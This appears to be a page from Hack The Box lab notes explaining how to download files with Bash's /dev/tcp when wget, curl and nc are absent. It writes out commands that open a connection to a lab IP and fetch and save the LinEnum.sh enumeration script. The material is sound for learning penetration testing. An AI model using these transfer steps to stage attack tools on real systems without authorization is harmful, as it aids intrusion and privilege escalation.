🐚 Download with Bash using /dev/tcp

Stuck on a minimal Linux system with no wget, no curl, no nc? 😱 Don't panic — as long as you have Bash v2.04+, you can use the hidden power of:

🔌 `/dev/tcp` — Bash’s Built-in Networking Superpower!

If Bash was compiled with --enable-net-redirections (which most modern ones are), you can use it to connect to IPs and ports — and even download files!

🌐 Step 1: Connect to the Webserver

Use the exec command to open a TCP connection to your target:

z3tssu@htb[/htb]$ exec 3<>/dev/tcp/10.10.10.32/80

📌 This opens a bidirectional connection (read & write) to port 80 and assigns it to file descriptor 3.

📥 Step 2: Send an HTTP GET Request

Now send a basic HTTP request for the file you want (e.g., LinEnum.sh):

z3tssu@htb[/htb]$ echo -e "GET /LinEnum.sh HTTP/1.1\n\n" >&3

💡 -e allows escape sequences like to simulate Enter. 📬 This sends your GET request over the connection.

👀 Step 3: Read and Print the Response

Now print the server’s response using cat:

z3tssu@htb[/htb]$ cat <&3

🖨️ This reads the incoming response (which includes both headers + file content).

💡 Pro Tip: Save to File

If you want to save the file instead of printing it:

z3tssu@htb[/htb]$ cat <&3 > LinEnum.sh

Previous💣 Fileless Attacks in Linux – Execute Directly Next🔐 SSH Downloads with scp

Last updated 10 months ago

hashtag🔌 /dev/tcp — Bash’s Built-in Networking Superpower!

hashtag🌐 Step 1: Connect to the Webserver

hashtag📥 Step 2: Send an HTTP GET Request

hashtag👀 Step 3: Read and Print the Response

hashtag💡 Pro Tip: Save to File

🔌 `/dev/tcp` — Bash’s Built-in Networking Superpower!

🌐 Step 1: Connect to the Webserver

📥 Step 2: Send an HTTP GET Request

👀 Step 3: Read and Print the Response

💡 Pro Tip: Save to File